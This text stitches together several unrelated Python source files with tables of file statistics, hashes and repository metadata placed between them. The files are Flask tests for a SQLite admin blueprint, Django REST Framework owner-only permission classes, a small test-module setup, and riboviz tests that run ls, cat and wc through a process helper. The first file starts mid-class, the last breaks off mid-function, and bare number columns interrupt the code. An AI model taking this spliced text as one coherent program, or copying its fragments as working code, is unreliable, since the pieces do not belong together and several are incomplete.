self.con.execute('CREATE TABLE department(dept CHAR(50) NOT NULL, emp_id INT NOT NULL );')
def tearDown(self):
os.unlink(flask_test_app.app.config['DATABASE'])
def test_index_page(self):
rv = self.app.get('/')
assert "hello world" in rv.data
def test_base_page(self):
rv = self.app.get('/sqlite/')
assert '<h1>sqlite Admin</h1>' in rv.data
def test_api_get_table(self):
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<input class="form-control state-add" name="name"></input>' in rv.data
assert '<input class="form-control state-add" name="salary"></input>' in rv.data
def test_api_get_invalid_table(self):
with self.assertRaises(Exception) as cm:
rv = self.app.get('/sqlite/api?table=test&sort=&dir=asc&offset=0')
self.assertEqual('invalid table `test`',str(cm.exception) )
def test_api_get_invalid_no_primary_key(self):
with self.assertRaises(Exception) as cm:
rv = self.app.get('/sqlite/api?table=department&sort=&dir=asc&offset=0')
self.assertEqual('No primary key for first column in table `department`',str(cm.exception) )
def test_api_add_row(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": "<a href="" class="alert-link">Refresh Page</a>"}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">testee mc test</span>' in rv.data
assert '<span class="state-rest">1469 Beverly Glen</span>' in rv.data
def test_api_add_row_invalid_table(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "test", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "invalid table `test`"}',rv.data.replace('\\',""))
def test_api_add_row_invalid_column(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "test": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "table company has no column named test"}',rv.data.replace('\\',""))
def test_api_add_row_invalid_no_primary_key(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "department", "dept": "dinosaurs", "emp_id": "23"})
self.assertEqual('{"status": 0, "error": "primaryKey"}',rv.data.replace('\\',""))
def test_api_edit_row(self):
self.test_api_add_row()
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": ""}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">1123 East Marlow Street' in rv.data
def test_api_edit_row_invalid_no_id(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "Request must include an id"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_table(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "test", "id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "invalid table `test`"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_column(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1", "test": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "no such column: test"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_no_primary_key(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "salary": "0"})
self.assertEqual('{"status": 0, "error": "primaryKey"}',rv.data.replace('\\',""))
def test_api_delete_row(self):
self.test_api_add_row()
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">1469 Beverly Glen' in rv.data
rv = self.app.post('/sqlite/api',data={"action": "delete", "table": "company","id":"1", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": "Row deleted"}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">1469 Beverly Glen' not in rv.data
def test_api_delete_row_invalid_table(self):
rv = self.app.post('/sqlite/api',data={"action": "delete", "table": "test", "id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "invalid table `test`"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_no_id(self):  # NOTE: duplicate of the identically named test above; this later definition shadows the earlier one
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "Request must include an id"}',rv.data.replace('\\',""))
def test_api_delete_row_invalid_no_primary_key(self):
rv = self.app.post('/sqlite/api',data={"action": "delete", "table": "company","id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "salary": "0"})
self.assertEqual('{"status": 0, "error": "primaryKey"}',rv.data.replace('\\',""))
class flask_test_app_extra_rules:
""" app setup with extra rules and a decorator """
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
def ruleTest1(self):
if 'name' in self.colData['name'] and self.value != 'Bob Barker':
raise ValueError('This is not Bob Barker!')
def ruleTest2(self):
if 'address' in self.colData['name'] and 'Beverly Glen' not in self.value:
raise ValueError('You cant live here!')
bpTest = sqliteAdminBlueprint(bpName = 'sqliteTest',dbPath=db_file[1],extraRules=[ruleTest1,ruleTest2])
app.register_blueprint(bpTest, url_prefix='/sqlite')
class testSQLiteBlueprintExtraRules(unittest.TestCase):
""" test blueprint when extra rules are passed """
def setUp(self):
self.db_fd, flask_test_app_extra_rules.app.config['DATABASE'] = db_file
flask_test_app_extra_rules.app.config['TESTING'] = True
self.app = flask_test_app_extra_rules.app.test_client()
self.con = sqlite3.connect(flask_test_app_extra_rules.app.config['DATABASE'])
self.con.execute('CREATE TABLE company( id integer PRIMARY KEY autoincrement, name TEXT NOT NULL, age integer NOT NULL, address CHAR(50), salary REAL );')
def tearDown(self):
os.unlink(flask_test_app_extra_rules.app.config['DATABASE'])
def test_index_page(self):
rv = self.app.get('/')
assert "hello world" in rv.data
def test_base_page(self):
rv = self.app.get('/sqlite/')
assert '<h1>sqlite Admin</h1>' in rv.data
def test_api_get_table(self):
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<input class="form-control state-add" name="name"></input>' in rv.data
assert '<input class="form-control state-add" name="salary"></input>' in rv.data
def test_api_add_row_pass(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "Bob Barker", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": "<a href="" class="alert-link">Refresh Page</a>"}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">Bob Barker</span>' in rv.data
assert '<span class="state-rest">1469 Beverly Glen</span>' in rv.data
def test_api_add_row_fail_new_rule1(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "This is not Bob Barker!"}',rv.data.replace('\\',""))
def test_api_edit_row_fail_new_rule1(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1","address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "This is not Bob Barker!"}',rv.data.replace('\\',""))
def test_api_add_row_fail_new_rule2(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1221 Sacremento St", "age": "23", "name": "Bob Barker", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "You cant live here!"}',rv.data.replace('\\',""))
def test_api_edit_row_fail_new_rule2(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1","address": "1221 Sacremento St", "age": "23", "name": "Bob Barker", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "You cant live here!"}',rv.data.replace('\\',""))
class flask_test_app_with_login_decorator:
""" app setup with a decorator that always redirects to login page """
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
@app.route('/login')
def login():
return "im a login page"
def decoratorTest(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 1==1:
return redirect(url_for('login', next=request.url))
return make_response(f(*args, **kwargs))
return decorated_function
bpTest = sqliteAdminBlueprint(bpName = 'sqliteTest',dbPath=db_file[1],decorator=decoratorTest)
app.register_blueprint(bpTest, url_prefix='/sqlite')
class testSQLiteBlueprintLoginDecorator(unittest.TestCase):
""" test blueprint when decorator is passed """
def setUp(self):
flask_test_app_with_login_decorator.app.config['TESTING'] = True
self.app = flask_test_app_with_login_decorator.app.test_client()
def test_index_page(self):
rv = self.app.get('/')
assert "hello world" in rv.data
def test_base_page_get(self):
rv = self.app.get('/sqlite/', follow_redirects=True)
assert 'im a login page' in rv.data
def test_base_page_post(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"}, follow_redirects=True)
assert 'im a login page' in rv.data
if __name__ == '__main__':
unittest.main()
| 49.191837
| 207
| 0.67159
| 1,754
| 12,052
| 4.482896
| 0.108894
| 0.032939
| 0.038916
| 0.041333
| 0.854127
| 0.830726
| 0.814829
| 0.789648
| 0.726313
| 0.702785
| 0
| 0.019819
| 0.12081
| 12,052
| 245
| 208
| 49.191837
| 0.722254
| 0.020246
| 0
| 0.445714
| 0
| 0.022857
| 0.387733
| 0.058619
| 0
| 0
| 0
| 0
| 0.228571
| 1
| 0.24
| false
| 0.005714
| 0.04
| 0.022857
| 0.388571
| 0.057143
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
233204c23d4470ea69c3ee9cdefd80a8920f0c93
| 1,370
|
py
|
Python
|
py_fitness/py_fitness/workout/permissions.py
|
audiolion/py-fitness
|
9e0ca785c73a07cb788685bbde6e840a7a2e3419
|
[
"MIT"
] | 1
|
2017-04-17T19:59:15.000Z
|
2017-04-17T19:59:15.000Z
|
py_fitness/py_fitness/workout/permissions.py
|
audiolion/py-fitness
|
9e0ca785c73a07cb788685bbde6e840a7a2e3419
|
[
"MIT"
] | 1
|
2016-12-09T01:58:46.000Z
|
2016-12-09T01:58:46.000Z
|
py_fitness/py_fitness/workout/permissions.py
|
audiolion/py-fitness
|
9e0ca785c73a07cb788685bbde6e840a7a2e3419
|
[
"MIT"
] | null | null | null |
from rest_framework import permissions
class WorkoutIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.author == request.user
class ExerciseIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.workout.author == request.user
class SetIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.exercise.workout.author == request.user
class UserIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.workout.author == request.user
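# Example wiring (not part of the original module; the model and serializer names
# below are hypothetical, only the permission class comes from this file):
#
#     from rest_framework import viewsets
#
#     class WorkoutViewSet(viewsets.ModelViewSet):
#         queryset = Workout.objects.all()          # hypothetical model
#         serializer_class = WorkoutSerializer      # hypothetical serializer
#         permission_classes = [WorkoutIsOwnerOrReadOnly]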
| 27.4
| 67
| 0.693431
| 161
| 1,370
| 5.819876
| 0.242236
| 0.106724
| 0.132337
| 0.175027
| 0.83031
| 0.794023
| 0.794023
| 0.794023
| 0.794023
| 0.794023
| 0
| 0
| 0.233577
| 1,370
| 49
| 68
| 27.959184
| 0.892381
| 0.186131
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.190476
| false
| 0
| 0.047619
| 0
| 0.809524
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88e3698ddd15e4eec956097054dfabf49c228508
| 142
|
py
|
Python
|
tests/__init__.py
|
Python-Tools/sserender
|
2a283e7e0c533f70dbb45d0adac35bb094723aac
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
Python-Tools/sserender
|
2a283e7e0c533f70dbb45d0adac35bb094723aac
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
Python-Tools/sserender
|
2a283e7e0c533f70dbb45d0adac35bb094723aac
|
[
"MIT"
] | null | null | null |
def setUpModule() -> None:
print("[Module sserender Test Start]")
def tearDownModule() -> None:
print("[Module sserender Test End]")
| 23.666667
| 42
| 0.669014
| 16
| 142
| 5.9375
| 0.625
| 0.189474
| 0.315789
| 0.505263
| 0.589474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176056
| 142
| 6
| 43
| 23.666667
| 0.811966
| 0
| 0
| 0
| 0
| 0
| 0.391608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
88efe5a40685f4a84b416f2757a2d89d34dbebdb
| 26,166
|
py
|
Python
|
riboviz/test/test_process_utils.py
|
rasilab/riboviz
|
a2ebaa7dac383e6ce0972626bf57fdba105d1780
|
[
"Apache-2.0"
] | 13
|
2020-10-20T13:03:11.000Z
|
2022-02-17T02:07:41.000Z
|
riboviz/test/test_process_utils.py
|
rasilab/riboviz
|
a2ebaa7dac383e6ce0972626bf57fdba105d1780
|
[
"Apache-2.0"
] | 306
|
2020-03-04T14:23:34.000Z
|
2022-02-26T14:51:02.000Z
|
riboviz/test/test_process_utils.py
|
rasilab/riboviz
|
a2ebaa7dac383e6ce0972626bf57fdba105d1780
|
[
"Apache-2.0"
] | 9
|
2020-04-26T20:27:02.000Z
|
2022-02-01T13:16:52.000Z
|
"""
:py:mod:`riboviz.process_utils` tests.
"""
import os.path
import tempfile
import pytest
from riboviz import process_utils
from riboviz import utils
@pytest.fixture(scope="function")
def tmp_stdout_file():
"""
Create a temporary file with a ``log`` suffix.
:return: path to temporary file
:rtype: str or unicode
"""
_, tmp_stdout_file = tempfile.mkstemp(prefix="tmp_stdout", suffix=".log")
yield tmp_stdout_file
if os.path.exists(tmp_stdout_file):
os.remove(tmp_stdout_file)
@pytest.fixture(scope="function")
def tmp_stderr_file():
"""
Create a temporary file with a ``log`` suffix.
:return: path to temporary file
:rtype: str or unicode
"""
_, tmp_stderr_file = tempfile.mkstemp(prefix="tmp_stderr", suffix=".log")
yield tmp_stderr_file
if os.path.exists(tmp_stderr_file):
os.remove(tmp_stderr_file)
@pytest.fixture(scope="function")
def tmp_redirect_file():
"""
Create a temporary file with a ``txt`` suffix.
:return: path to temporary file
:rtype: str or unicode
"""
_, tmp_redirect_file = tempfile.mkstemp(prefix="tmp_redirect_",
suffix=".txt")
yield tmp_redirect_file
if os.path.exists(tmp_redirect_file):
os.remove(tmp_redirect_file)
@pytest.fixture(scope="function")
def tmp_cmd_file():
"""
Create a temporary file with a ``sh`` suffix.
:return: path to temporary file
:rtype: str or unicode
"""
_, tmp_cmd_file = tempfile.mkstemp(prefix="tmp_cmd_", suffix=".sh")
yield tmp_cmd_file
if os.path.exists(tmp_cmd_file):
os.remove(tmp_cmd_file)
def test_run_command_stdout_stderr():
"""
Test :py:func:`riboviz.process_utils.run_command` using standard
output and standard error.
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
try:
process_utils.run_command(cmd)
except AssertionError:
pass
def test_run_command_log_out_err(tmp_stdout_file, tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using files to
capture standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
with open(tmp_stdout_file, 'w') as out, \
open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_command(cmd, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == path # Output from ls
assert lines[1] == path # Output from ls
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
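# Newer GNU coreutils quote the missing file name while older releases print it
# unquoted, so both message variants are accepted here and in the similar asserts below.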
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
def test_run_command_log_out_error_one_file(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using a single
file to capture both standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
with open(tmp_stdout_file, "w") as out_err:
try:
process_utils.run_command(cmd, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
def test_run_command_log_out_err_alt(tmp_stdout_file, tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using files to
capture standard output and standard error. Different commands are
submitted to the operating system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd = ["wc", "-l", path, "no-such-file.txt", path]
with open(tmp_stdout_file, 'w') as out, \
open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_command(cmd, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[1] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[2] == "%5d total" % (num_lines * 2) # Output from wc
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"wc: no-such-file.txt: No such file or directory"
def test_run_command_log_out_error_one_file_alt(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using a single
file to capture both standard output and standard error. Different
commands are submitted to the operating system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd = ["wc", "-l", path, "no-such-file.txt", path]
with open(tmp_stdout_file, "w") as out_err:
try:
process_utils.run_command(cmd, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 4
assert lines[0] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[1] == "wc: no-such-file.txt: No such file or directory"
assert lines[2] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[3] == "%5d total" % (num_lines * 2) # Output from wc
def test_run_redirect_command_stdout(tmp_redirect_file):
"""
Test :py:func:`riboviz.process_utils.run_redirect_command` using
standard output.
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt"]
try:
process_utils.run_redirect_command(cmd, tmp_redirect_file)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
def test_run_redirect_command_tmp_stderr_file(tmp_redirect_file,
tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_redirect_command` using
a file to capture standard error.
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt", path]
with open(tmp_stderr_file, "w") as err:
try:
process_utils.run_redirect_command(cmd, tmp_redirect_file, err)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"cat: no-such-file.txt: No such file or directory"
def test_run_pipe_command_stdout_stderr():
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using
standard output and standard error.
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
try:
process_utils.run_pipe_command(cmd1, cmd2)
except AssertionError:
pass
def test_run_pipe_command_log_out_err(tmp_stdout_file, tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using files
to capture standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
with open(tmp_stdout_file, 'w') as out, open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 1
assert lines[0] == str(num_lines * 2) # Output from wc
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == "cat: no-such-file: No such file or directory"
def test_run_pipe_command_log_out_err_one_file(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using a
single file to capture both standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
with open(tmp_stdout_file, 'w') as out_err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == "cat: no-such-file: No such file or directory"
assert str(num_lines * 2) == lines[1] # Output from wc
def test_run_pipe_command_stdout_stderr_error():
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using
standard output and standard error, where the second command in
the pipeline includes an error.
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
try:
process_utils.run_pipe_command(cmd1, cmd2)
except AssertionError:
pass
def test_run_pipe_command_log_out_err_error(tmp_stdout_file,
tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using files
to capture standard output and standard error, where the second
command in the pipeline includes an error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
with open(tmp_stdout_file, 'w') as out, open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 0 # Expect output to be empty
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 3
assert lines[0] == "cat: no-such-file: No such file or directory"
assert lines[1] == "wc: invalid option -- 'x'"
assert lines[2] == "Try 'wc --help' for more information."
def test_run_pipe_command_log_out_err_one_file_error(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using a
single file to capture both standard output and standard error,
where the second command in the pipeline includes an error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
with open(tmp_stdout_file, 'w') as out_err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == "cat: no-such-file: No such file or directory"
assert lines[1] == "wc: invalid option -- 'x'"
assert lines[2] == "Try 'wc --help' for more information."
def test_run_logged_command(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
try:
process_utils.run_logged_command(cmd, tmp_stdout_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
def test_run_logged_command_cmd_file(tmp_stdout_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error and
a file to capture commands sent to the operating system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
try:
process_utils.run_logged_command(cmd, tmp_stdout_file,
tmp_cmd_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
assert actual_cmds[0].rstrip('\n') == utils.list_to_str(cmd)
def test_run_logged_command_cmd_file_cmd_to_log(tmp_stdout_file,
tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error and
a file to capture commands sent to the operating system, where the
command to be logged differs from that submitted.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
cmd_to_log = ["ls", path, "'no-such-file.txt'", path]
try:
process_utils.run_logged_command(cmd,
tmp_stdout_file,
tmp_cmd_file,
cmd_to_log=cmd_to_log)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
assert actual_cmds[0].rstrip('\n') == utils.list_to_str(cmd_to_log)
def test_run_logged_command_cmd_file_dry_run(tmp_stdout_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error and
a file to capture commands sent to the operating system, with
the ``dry_run`` parameter set to ``True``.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
process_utils.run_logged_command(cmd, tmp_stdout_file,
tmp_cmd_file, True)
with open(tmp_stdout_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
assert actual_cmds[0].rstrip('\n') == utils.list_to_str(cmd)
def test_run_logged_redirect_command(tmp_stderr_file, tmp_redirect_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_redirect_command`
using a file to capture standard error.
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
"""
path = os.path.realpath(__file__)
